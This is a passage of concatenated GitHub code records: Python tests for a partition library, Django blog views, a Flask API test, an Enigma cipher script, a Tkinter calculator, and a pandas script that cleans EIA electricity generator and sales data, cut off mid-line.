\"\"\"\n @classmethod\n def setup_class(cls):\n cls.cf = CyclicCacheFactory(CACHE_SIZE)\n\n def setup(self):\n self.cs = CanonicalSet(0,self.cf)\n\n def test_get_canonical(self):\n \"\"\"\n Test that get_canonical works.\n \"\"\"\n eq_(self.cs.get_canonical(),0)\n\n def test_new_canon(self):\n \"\"\"\n Test that new_canon changes canonical properly.\n \"\"\"\n eq_(self.cs.get_canonical(),0)\n self.cs.new_canon(1)\n eq_(self.cs.get_canonical(),1)\n\n def test_clean_div(self):\n \"\"\"\n Test that a div for a one-element set works.\n \"\"\"\n div1 = self.cs / (lambda x: x == 0)\n eq_(len(div1),1)\n ok_(True in div1)\n eq_(div1[True].get_canonical(),0)\n div2 = self.cs / (lambda x: x)\n eq_(len(div2),1)\n ok_(0 in div2)\n eq_(div2[0].get_canonical(),0)\n\n def test_same_div(self):\n \"\"\"\n Test that a div for a multi-element set, with all items in the same\n partition, works.\n \"\"\"\n self.cs.append_sample(1)\n div1 = self.cs / (lambda x: x != 3)\n eq_(len(div1),1)\n ok_(True in div1)\n eq_(div1[True].get_canonical(),0)\n\n def test_different_div(self):\n \"\"\"\n Test that a div for a multi-element set, with items in different\n partitions, works.\n \"\"\"\n self.cs.append_sample(3)\n div1 = self.cs / (lambda x: x != 3)\n eq_(len(div1),2)\n ok_(True in div1)\n ok_(False in div1)\n eq_(div1[True].get_canonical(),0)\n eq_(div1[False].get_canonical(),3)\n self.cs.append_sample(1)\n div2 = self.cs / (lambda x: x)\n eq_(len(div2),3)\n for i in [0,1,3]:\n ok_(i in div2)\n eq_(div2[i].get_canonical(),i)\n","repo_name":"amosonn/equiv_partition","sub_path":"tests/test_canon_set.py","file_name":"test_canon_set.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11974033496","text":"from django.shortcuts import render, get_object_or_404\nfrom blogapp.form import CommentForm\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n\n# Create your views here.\nfrom blogapp.models import Blog\n\n\ndef home(request):\n blogs = Blog.objects.all()\n context = {\n \"blogs\":blogs\n }\n return render(request, \"blogapp/index.html\", context)\n\n\ndef blog(request):\n blogs = Blog.objects.all()\n context = {'blogs': blogs}\n return render(request, \"blogapp/blog-posts.html\", context)\n\n\ndef blogpost(request, slug, pk):\n form = CommentForm()\n # post = Blog.objects.get(pk=int(pk))\n post = get_object_or_404(Blog, pk=int(pk))\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n com = form.save(commit=False)\n com.blog = post\n com.save()\n # return HttpResponseRedirect(reverse('blogapp:blogpost'))\n context = {\n 'post':post\n }\n return render(request, 'blogapp/blog-post-details.html', context)\n","repo_name":"goodieboy/blog","sub_path":"blogapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42949483155","text":"import sys\r\nimport json\r\nimport unittest\r\n\r\nsys.path.append('../..')\r\nfrom api import *\r\n\r\nclass TestFunctions(unittest.TestCase):\r\n def setup(self):\r\n app.app.config['TESTING'] = True\r\n self.app = app.app.test_client()\r\n # Test of Output function\r\n \r\n def test_output(self):\r\n with app.test_request_context():\r\n out = output('true','cleartext', '1234','true', '[]')\r\n response = [\r\n {\r\n 'active': 'true',\r\n 'authentication_method': 'cleartext',\r\n 'password': '1234',\r\n 'authenticated': 'false',\r\n 'roles': '[]'\r\n }\r\n ]\r\n data = json.loads(out.get_data(as_text=True))\r\n # Assert response\r\n self.assertEqual(data['response'], response)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"erikkgagewhitt/Wiki440","sub_path":"__tests__/json_api_test.py","file_name":"json_api_test.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28569883650","text":"\"\"\"\nEnigma Cipher program\nEncipher a text file using Enigma Cipher\nNumber of rotors can be specified\nRotors can be used in different positions\n\n++Date created: 12/21/2016\n++Author: Bao Thai - btt4530@g.rit.edu\n\"\"\"\nfrom RotorBox import ROTORS\nfrom MirrorBox import MIRRORS\nfrom sys import argv\n\n#Array holding alphabet letters\nALPHABET = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n\n#print(ROTORS[1][ALPHABET.index(\"A\")])\n#print(MIRRORS[0][1])\n\n\"\"\"\nFind the input to a rotor that gives the specified output\nParam: rotor: investigated rotor\n\t shift: shift of said rotor (0-26)\n\t output: output to find the input\nOutput: The input that gives the specified output (inverse function)\n\"\"\"\ndef findInput(rotor,shift,output):\n\tcurrent_rotor = rotor\n\tcount = 0 \n\twhile count < len(rotor):\n\t\tpos = (count + shift)%26 #which shift are being used \n\t\tout_check = (count + rotor[pos])%26 #output of current count\n\t\tif out_check < 0: \n\t\t\tout_check = 26 + out_check\n\t\tif out_check == output:\n\t\t\treturn count\n\t\tcount = count + 1\n\n\n\"\"\"\nEncode a line using Enigma\nParam: num_rotor: how many rotors are used\n\t carry_num\n\"\"\"\ndef encodeEnigma(num_rotor,lines):\n\t#Variable declaration\n\tarr_result = []\n\trotors = [] #rotors placed in the machine\n\tarr_shifts = [] #shift for each rotor\n\tarr_modulo = [] #get the modulo for your rotors\n\tnum = 0 #general counter variable\n\tmirror = MIRRORS[0] #mirror to be placed in machine\n\t\n\t#Getting user's setup\n\twhile num < num_rotor:\n\t\tstring_1 = \"Select a rotor from 0 to \" + str(len(ROTORS)-1) + \" for Rotor #\" + str(num+1) + \":>\"\n\t\trotor = int(input(string_1)) \n\t\trotors.append(ROTORS[rotor])\n\t\tstring_2 = \"Init shift of Rotor #\" + str(num+1) + \":>\"\n\t\tshift = int(input(string_2))\n\t\tarr_shifts.append(shift)\n\t\t#Set up the modulo in fibonacci sequence ;)\n\t\tif num == 0:\n\t\t\tarr_modulo.append(1)\n\t\tif num == 1:\n\t\t\tarr_modulo.append(2)\n\t\tif num > 1:\n\t\t\tarr_modulo.append(arr_modulo[num-1] + arr_modulo[num-2])\n\t\tnum = num + 1\n\n\tnum = 0\n\tline_count = 0\n\twhile line_count < len(lines):\n\t\ttext = lines[line_count]\n\t\t#***************#\n\t\tresult = \"\"\n\t\tplain_text = text\n\t\tplain_text = plain_text.upper()\n\t\tfor char in plain_text:\n\t\t\tif char.isalpha():\n\t\t\t\tprint(char)\n\t\t\t\tencoded_num = ALPHABET.index(char)\n\t\t\t\trotor_count = 0\n\t\t\t\t#encode through rotor\n\t\t\t\twhile rotor_count < len(rotors):\n\t\t\t\t\trotor = rotors[rotor_count] #get the rotor\n\t\t\t\t\tshift = (arr_shifts[rotor_count] + encoded_num)%26 #get the corresponding shift\n\t\t\t\t\tencoded_num = (encoded_num + rotor[shift])%26\n\t\t\t\t\tif encoded_num < 0: \n\t\t\t\t\t\tencoded_num = 26 + encoded_num\n\t\t\t\t\trotor_count = rotor_count+1\n\t\t\t\t\tprint(\"Encode: \"+ALPHABET[encoded_num])\n\t\t\t\t#encode mirror\t\n\t\t\t\tencoded_num = mirror[(encoded_num)%26]\n\t\t\t\tprint(\"Mirror: \"+ALPHABET[encoded_num])\n\t\t\t\t#going up the rotors idea: use index of, be very careful of shifts\n\t\t\t\trotor_count = len(rotors) - 1\n\t\t\t\twhile rotor_count >= 0: \n\t\t\t\t\trotor = rotors[rotor_count] #get the rotor\n\t\t\t\t\tencoded_num = findInput(rotor,arr_shifts[rotor_count],encoded_num)\n\t\t\t\t\trotor_count = rotor_count - 1\n\t\t\t\t\tprint(\"Up: \"+ALPHABET[encoded_num])\n\t\t\t\tchar = ALPHABET[encoded_num]\n\t\t\t\t#Set the shifts for the rotors for next char\n\t\t\t\trotor_count = 0\n\t\t\t\twhile rotor_count < len(arr_shifts):\n\t\t\t\t\tif num % arr_modulo[rotor_count] == 0:\n\t\t\t\t\t\tarr_shifts[rotor_count] = (arr_shifts[rotor_count] + 1)%26\n\t\t\t\t\trotor_count = rotor_count+1\n\t\t\t\tprint(arr_shifts)\n\n\t\t\t\tnum = num + 1\n\t\t\tresult += char\n\t\tarr_result.append(result)\n\t\tline_count = line_count + 1\n\treturn arr_result\n\ndef main():\n\tscript, plain_file, encoded_file, num_rotor = argv\n\tplain = open(plain_file,\"r\")\n\tencoded = open(encoded_file,\"w+\")\n\trotor_count = int(num_rotor)\n\t\n\tinput_lines = []\n\toutput_lines = []\n\tfor line in plain:\n\t\tinput_lines.append(line)\n\toutput_lines = encodeEnigma(rotor_count,input_lines)\n\tfor line in output_lines:\n\t\tencoded.write(line)\n\tplain.close()\n\tencoded.close()\n\tprint(\"Done!\")\n\nif __name__ == '__main__':\n main()\n ","repo_name":"thaitribao/Cipher_Scripts","sub_path":"Enigma/Enigma.py","file_name":"Enigma.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12675598944","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title('A calculator by anukul')\r\n\r\ne = Entry(root, width=35, borderwidth=5)\r\ne.grid(row=0, column=0, columnspan=3)\r\n\r\n\r\ndef button_click(number):\r\n current = e.get()\r\n e.delete(0, END)\r\n\r\n e.insert(0, str(current) + str(number))\r\n\r\n\r\ndef button_clear():\r\n e.delete(0, END)\r\n\r\n\r\ndef button_add():\r\n global sign\r\n sign = '+'\r\n first_number = e.get()\r\n global f_num\r\n f_num = int(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_sub():\r\n global sign\r\n sign = '-'\r\n first_number = e.get()\r\n global f_num\r\n f_num = int(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_div():\r\n global sign\r\n sign = '/'\r\n first_number = e.get()\r\n global f_num\r\n f_num = float(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_multiply():\r\n global sign\r\n sign = '*'\r\n first_number = e.get()\r\n global f_num\r\n f_num = int(first_number)\r\n e.delete(0, END)\r\n\r\n\r\ndef button_equal():\r\n second_number = e.get()\r\n if sign == '+':\r\n e.delete(0, END)\r\n\r\n e.insert(0, int(f_num) + int(second_number))\r\n\r\n if sign == '-':\r\n e.delete(0, END)\r\n\r\n e.insert(0, int(f_num) - int(second_number))\r\n if sign == '*':\r\n e.delete(0, END)\r\n\r\n e.insert(0, int(f_num) * int(second_number))\r\n if sign == '/':\r\n e.delete(0, END)\r\n\r\n e.insert(0, float(f_num) / float(second_number))\r\n\r\n\r\nbutton_1 = Button(root, text='1', padx=40, pady=20, command=lambda: button_click(1),fg='red')\r\nbutton_2 = Button(root, text='2', padx=40, pady=20, command=lambda: button_click(2),fg='red')\r\nbutton_3 = Button(root, text='3', padx=40, pady=20, command=lambda: button_click(3),fg='red')\r\nbutton_4 = Button(root, text='4', padx=40, pady=20, command=lambda: button_click(4),fg='red')\r\nbutton_5 = Button(root, text='5', padx=40, pady=20, command=lambda: button_click(5),fg='red')\r\nbutton_6 = Button(root, text='6', padx=40, pady=20, command=lambda: button_click(6),fg='red')\r\nbutton_7 = Button(root, text='7', padx=40, pady=20, command=lambda: button_click(7),fg='red')\r\nbutton_8 = Button(root, text='8', padx=40, pady=20, command=lambda: button_click(8),fg='red')\r\nbutton_9 = Button(root, text='9', padx=40, pady=20, command=lambda: button_click(9),fg='red')\r\nbutton_10 = Button(root, text='0', padx=40, pady=20, command=lambda: button_click(0),fg='red')\r\nbutton_clear = Button(root, text='AC', padx=35, pady=20, command=button_clear, bg='red', fg='black')\r\nbutton_add = Button(root, text='+', padx=40, pady=20, command=button_add,fg='red')\r\nbutton_sub = Button(root, text='-', padx=40, pady=20, command=button_sub,fg='red')\r\nbutton_div = Button(root, text='/', padx=40, pady=20, command=button_div,fg='red')\r\nbutton_multiply = Button(root, text='*', padx=40, pady=20, command=button_multiply,fg='red')\r\nbutton_equal = Button(root, text='=', padx=140, pady=20, command=button_equal, bg='blue', fg='white')\r\n\r\n# put buttons on the screen\r\nbutton_1.grid(row=3, column=0)\r\nbutton_2.grid(row=3, column=1)\r\nbutton_3.grid(row=3, column=2)\r\nbutton_4.grid(row=2, column=0)\r\nbutton_5.grid(row=2, column=1)\r\nbutton_6.grid(row=2, column=2)\r\nbutton_7.grid(row=1, column=0)\r\nbutton_8.grid(row=1, column=1)\r\nbutton_9.grid(row=1, column=2)\r\nbutton_10.grid(row=4, column=0)\r\nbutton_clear.grid(row=4, column=2)\r\nbutton_add.grid(row=4, column=1)\r\nbutton_sub.grid(row=5, column=0)\r\nbutton_div.grid(row=5, column=1)\r\nbutton_multiply.grid(row=5, column=2)\r\n\r\nbutton_equal.grid(row=6, column=0, columnspan=3)\r\n\r\nroot.mainloop()\r\n","repo_name":"Anukul2058/python-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30578369458","text":"import pandas as pd\nimport numpy as np\nfrom simpledbf import Dbf5\nimport math\n\ndef re_index_sixty(sixty):\n for item in sixty.items():\n headers = sixty[item[0]].iloc[0]\n sixty[item[0]] = pd.DataFrame(sixty[item[0]].values[1:], columns=headers)\n\n\ndef month_agg(sixty):\n default = sixty[1]\n for item in sixty.items():\n if item[0] > 1:\n default = default.append(item[1]).copy()\n return default\n\ndef add_month(sixty):\n for item in sixty.items():\n item[1]['Month'] = item[0]\n\ndef rename_cols(sixty):\n for item in sixty.items():\n item[1].columns = item[1].columns.str.upper()\n item[1].columns = item[1].columns.str.replace(' ', '')\n item[1].columns = item[1].columns.str.replace('-', '')\n item[1].columns = item[1].columns.str.replace('_', '')\n item[1].columns = item[1].columns.str.replace('\\\\n', '')\n item[1].columns = item[1].columns.str.replace('ENTITYID', 'UTILITYID')\n item[1].columns = item[1].columns.str.replace('ENTITYNAME', 'UTILITYNAME')\n \n \ndef drop_cols(sixty):\n for item in sixty.items():\n item[1].drop(columns=['TECHNOLOGY','PRIMEMOVERCODE', 'OPERATINGMONTH', 'OPERATINGYEAR',\n 'PLANNEDRETIREMENTMONTH', 'PLANNEDRETIREMENTYEAR', 'STATUS',\n 'PLANNEDDERATEYEAR', 'PLANNEDDERATEMONTH',\n 'PLANNEDDERATEOFSUMMERCAPACITY(MW)', 'PLANNEDUPRATEYEAR',\n 'PLANNEDUPRATEMONTH', 'PLANNEDUPRATEOFSUMMERCAPACITY(MW)', 'COUNTY','BALANCINGAUTHORITYCODE',\n 'GOOGLEMAP','BINGMAP', 'UNITCODE','SECTOR','PLANTSTATE','GENERATORID'],errors='ignore').copy()\n\ndef clean_agg_sixtys(sixtys=sixtys):\n out = {}\n for item in sixtys.items():\n re_index_sixty(item[1])\n rename_cols(item[1])\n add_month(item[1])\n drop_cols(item[1])\n out[item[0]] = month_agg(item[1])\n for key in out.keys():\n out[key]['DATAYEAR'] = 2000 + key\n return out\n\ndef gentype(row):\n if row['ENERGYSOURCECODE'] == 'Coal Integrated Gasification Combined Cycle' or row['ENERGYSOURCECODE'] == 'Conventional Steam Coal':\n return 'coal'\n elif row['ENERGYSOURCECODE'] == \"Natural Gas Fired Combined Cycle\" or row['ENERGYSOURCECODE'] == 'Natural Gas Fired Combustion Turbine' or row['ENERGYSOURCECODE'] == 'Natural Gas Internal Combustion Engine' \\\n or row['ENERGYSOURCECODE'] == 'Natural Gas Steam Turbine' or row['ENERGYSOURCECODE'] == 'Natural Gas with Compressed Air Storage' or row['ENERGYSOURCECODE'] == 'Other Natural Gas' or row['ENERGYSOURCECODE'] == 'Other Gases'or row['ENERGYSOURCECODE'] == 'Landfill Gas':\n return 'natural_gas'\n elif row['ENERGYSOURCECODE'] == 'Petroleum Coke' or row['ENERGYSOURCECODE'] == 'Petroleum Liquids':\n return 'oil'\n elif row['ENERGYSOURCECODE'] == 'Conventional Hydroelectric' or row['ENERGYSOURCECODE'] == 'Hydroelectric Pumped Storage':\n return 'hydroelectric'\n elif row['ENERGYSOURCECODE'] == 'Geothermal':\n return 'geothermal'\n elif row['ENERGYSOURCECODE'] == 'Onshore Wind Turbine' or row['ENERGYSOURCECODE'] == 'Offshore Wind Turbine':\n return 'wind'\n elif row['ENERGYSOURCECODE'] == 'Solar Photovoltaic' or row['ENERGYSOURCECODE'] == 'Solar Thermal with Energy Storage' or row['ENERGYSOURCECODE'] == 'Solar Thermal without Energy Storage':\n return 'solar'\n elif row['ENERGYSOURCECODE'] == 'Nuclear':\n return 'nuclear'\n elif row['ENERGYSOURCECODE'] == 'ANT' or row['ENERGYSOURCECODE'] == 'BIT' or row['ENERGYSOURCECODE'] == 'COL' or row['ENERGYSOURCECODE'] == 'COM' or row['ENERGYSOURCECODE'] == 'CWM' or row['ENERGYSOURCECODE'] == 'SUB'\\\n or row['ENERGYSOURCECODE'] == 'LIG' or row['ENERGYSOURCECODE'] == 'SGC' or row['ENERGYSOURCECODE'] == 'WC' or row['ENERGYSOURCECODE'] == 'RC':\n return 'coal'\n elif row['ENERGYSOURCECODE'] == 'BFG' or row['ENERGYSOURCECODE'] == 'NG' or row['ENERGYSOURCECODE'] == 'OG' or row['ENERGYSOURCECODE'] == 'GAS' or row['ENERGYSOURCECODE'] == 'MTH' or row['ENERGYSOURCECODE'] == 'LNG'\\\n or row['ENERGYSOURCECODE'] == 'LPG' or row['ENERGYSOURCECODE'] == 'RG' or row['ENERGYSOURCECODE'] == 'MTH' or row['ENERGYSOURCECODE'] == 'SNG' or row['ENERGYSOURCECODE'] == 'LFG':\n return 'natural_gas'\n elif row['ENERGYSOURCECODE'] == 'DFO' or row['ENERGYSOURCECODE'] == 'JF' or row['ENERGYSOURCECODE'] == 'KER' or row['ENERGYSOURCECODE'] == 'PC' or row['ENERGYSOURCECODE'] == 'PG' or row['ENERGYSOURCECODE'] == 'RFO'\\\n or row['ENERGYSOURCECODE'] == 'SGP' or row['ENERGYSOURCECODE'] == 'WO' or row['ENERGYSOURCECODE'] == 'CRU' or row['ENERGYSOURCECODE'] == 'FO1' or row['ENERGYSOURCECODE'] == 'FO2' or row['ENERGYSOURCECODE'] == 'FO3'\\\n or row['ENERGYSOURCECODE'] == 'FO4' or row['ENERGYSOURCECODE'] == 'FO5' or row['ENERGYSOURCECODE'] == 'FO6' or row['ENERGYSOURCECODE'] == 'JF' or row['ENERGYSOURCECODE'] == 'KER' or row['ENERGYSOURCECODE'] == 'PET'\\\n or row['ENERGYSOURCECODE'] == 'TOP':\n return 'oil'\n elif row['ENERGYSOURCECODE'] == 'WAT':\n return 'hydroelectric'\n elif row['ENERGYSOURCECODE'] == 'GST' or row['ENERGYSOURCECODE'] == 'GEO':\n return 'geothermal'\n elif row['ENERGYSOURCECODE'] == 'WND':\n return 'wind'\n elif row['ENERGYSOURCECODE'] == 'SUN':\n return 'solar'\n elif row['ENERGYSOURCECODE'] == 'NUC' or row['ENERGYSOURCECODE'] == 'UR':\n return 'nuclear'\n else:\n return 'other/unreported'\n\ndef re_index_sixtyones(sixtyones=sixtyones):\n for item in sixtyones.items():\n headers = sixtyones[item[0]].iloc[1]\n sixtyones[item[0]] = pd.DataFrame(sixtyones[item[0]].values[2:], columns=headers)\n\ndef sixtyones_drop(sixtyones=sixtyones):\n for item in sixtyones.items():\n sixtyones[item[0]] = item[1].iloc[:,[0,1,2,3,4,5,19,20,21]].copy()\n\ndef sixtyones_rename(sixtyones=sixtyones):\n for item in sixtyones.items():\n sixtyones[item[0]] = item[1].rename(columns={'THOUSANDSDOLLARS':'TOTALREVENUE','MEGAWATTHOURS':'TOTALSALES','COUNT':'TOTALCUSTOMERS'})\n \ndef sixtyones_addyear(sixtyones=sixtyones):\n for item in sixtyones.items():\n item[1]['DATAYEAR'] = 2000 + item[0]\n\ndef droplast(sixtyones=sixtyones):\n for df in sixtyones.items():\n sixtyones[df[0]] = df[1].iloc[:-1,:]\n\ndef clean_sixtyones(sixtyones=sixtyones):\n re_index_sixtyones()\n sixtyones_drop()\n rename_cols(sixtyones)\n sixtyones_rename()\n sixtyones_addyear()\n droplast()\n\ndef owntype(row):\n if row['OWNERSHIP'] == 'Municipal' or row['OWNERSHIP'] == 'MUNICIPAL' or row['OWNERSHIP'] == 'Federal' or row['OWNERSHIP'] == 'State' or row['OWNERSHIP'] == 'Political Subdivision':\n return 1\n elif row['OWNERSHIP'] == \"COOPERATIVE\" or row['OWNERSHIP'] == 'Cooperative' or row['OWNERSHIP'] == 'COOP' or row['OWNERSHIP'] == 'coop':\n return 2\n elif row['OWNERSHIP'] == 'Investor Owned':\n return 3\n elif row['OWNERSHIP'] == 'Behind the Meter':\n return 4\n else:\n return 0\n\nif __name__ == '__main__':\n sixtyone_2016_rev = pd.read_excel('../data/861m/f8262016.xls',sheet_name=0)\n sixtyone_2017_rev = pd.read_excel('../data/861m/retail_sales_2017.xlsx',sheet_name=0)\n sixtyone_2018_rev = pd.read_excel('../data/861m/retail_sales_2018.xlsx',sheet_name=0)\n sixtyone_2019_rev = pd.read_excel('../data/861m/retail_sales_2019.xlsx',sheet_name=0)\n\n yr = 2016\n sixty_2016_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2016_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n yr = 2017\n sixty_2017_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2017_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n yr = 2018\n sixty_2018_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2018_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n yr = 2019\n sixty_2019_1 = pd.read_excel(f'../data/860m/january_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_2 = pd.read_excel(f'../data/860m/february_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_3 = pd.read_excel(f'../data/860m/march_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_4 = pd.read_excel(f'../data/860m/april_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_5 = pd.read_excel(f'../data/860m/may_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_6 = pd.read_excel(f'../data/860m/june_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_7 = pd.read_excel(f'../data/860m/july_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_8 = pd.read_excel(f'../data/860m/august_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_9 = pd.read_excel(f'../data/860m/september_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_10 = pd.read_excel(f'../data/860m/october_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_11 = pd.read_excel(f'../data/860m/november_generator{yr}.xlsx',sheet_name=0)\n sixty_2019_12 = pd.read_excel(f'../data/860m/december_generator{yr}.xlsx',sheet_name=0)\n\n sixty_2016 = {1:sixty_2016_1,2:sixty_2016_2,3:sixty_2016_3,4:sixty_2016_4\n ,5:sixty_2016_5,6:sixty_2016_6,7:sixty_2016_7,8:sixty_2016_8\n ,9:sixty_2016_9,10:sixty_2016_10,11:sixty_2016_11,12:sixty_2016_12}\n\n sixty_2017 = {1:sixty_2017_1,2:sixty_2017_2,3:sixty_2017_3,4:sixty_2017_4\n ,5:sixty_2017_5,6:sixty_2017_6,7:sixty_2017_7,8:sixty_2017_8\n ,9:sixty_2017_9,10:sixty_2017_10,11:sixty_2017_11,12:sixty_2017_12}\n\n sixty_2018 = {1:sixty_2018_1,2:sixty_2018_2,3:sixty_2018_3,4:sixty_2018_4\n ,5:sixty_2018_5,6:sixty_2018_6,7:sixty_2018_7,8:sixty_2018_8\n ,9:sixty_2018_9,10:sixty_2018_10,11:sixty_2018_11,12:sixty_2018_12}\n\n sixty_2019 = {1:sixty_2019_1,2:sixty_2019_2,3:sixty_2019_3,4:sixty_2019_4\n ,5:sixty_2019_5,6:sixty_2019_6,7:sixty_2019_7,8:sixty_2019_8\n ,9:sixty_2019_9,10:sixty_2019_10,11:sixty_2019_11,12:sixty_2019_12}\n\n sixtys = {16:sixty_2016,17:sixty_2017,18:sixty_2018,19:sixty_2019}\n\n sixtys_clean = clean_agg_sixtys()\n sixtys_clean_f = {}\n for df in sixtys_clean.items():\n sixtys_clean_f[df[0]] = df[1].drop(columns=['TECHNOLOGY','PRIMEMOVERCODE', 'OPERATINGMONTH', 'OPERATINGYEAR',\n 'PLANNEDRETIREMENTMONTH', 'PLANNEDRETIREMENTYEAR', 'STATUS',\n 'PLANNEDDERATEYEAR', 'PLANNEDDERATEMONTH',\n 'PLANNEDDERATEOFSUMMERCAPACITY(MW)', 'PLANNEDUPRATEYEAR',\n 'PLANNEDUPRATEMONTH', 'PLANNEDUPRATEOFSUMMERCAPACITY(MW)', 'COUNTY','BALANCINGAUTHORITYCODE',\n 'GOOGLEMAP','BINGMAP', 'UNITCODE','SECTOR','PLANTSTATE','GENERATORID'],errors='ignore').copy()\n sixtys_clean_f[df[0]] = sixtys_clean_f[df[0]].iloc[:-1,:]\n \n sixtys_full = sixtys_clean_f[16]\n i = 0\n for df in sixtys_clean_f.items():\n if i >= 1:\n sixtys_full = pd.concat([sixtys_full,df[1]],axis=0,ignore_index=True)\n i += 1\n\n sixtys_full = sixtys_full.replace(r'^\\s*$', np.nan, regex=True)\n sixtys_full['NETSUMMERCAPACITY(MW)'].fillna(sixtys_full['NAMEPLATECAPACITY(MW)'], inplace=True)\n sixtys_full['NAMEPLATECAPACITY(MW)'].fillna(sixtys_full['NETSUMMERCAPACITY(MW)'], inplace=True)\n sixtys_full['NETWINTERCAPACITY(MW)'].fillna(sixtys_full['NAMEPLATECAPACITY(MW)'], inplace=True)\n sixtys_full = sixtys_full.dropna()\n\n sixtys_full['GEN_TYPE'] = sixtys_full.apply (lambda row: gentype(row), axis=1)\n\n sixtys_full = sixtys_full.infer_objects()\n sixtys_full = sixtys_full.rename(columns={'Month':'MONTH','UTILITYID':'UTILITYNUMBER'})\n sixtys_full = sixtys_full.drop(columns=['ENERGYSOURCECODE'])\n\n sixtys_full.to_csv('../data/860m_clean.csv',index=False)\n\n sixtyones = {16:sixtyone_2016_rev,17:sixtyone_2017_rev,18:sixtyone_2018_rev,\n 19:sixtyone_2019_rev}\n \n clean_sixtyones()\n sixtyones_full = sixtyones[16]\n i = 0\n for df in sixtyones.items():\n if i >= 1:\n sixtyones_full = pd.concat([sixtyones_full,df[1]],axis=0,ignore_index=True)\n i += 1\n\n sixtyones_full['OWNERTYPE'] = sixtyones_full.apply (lambda row: owntype(row), axis=1)\n\n f = 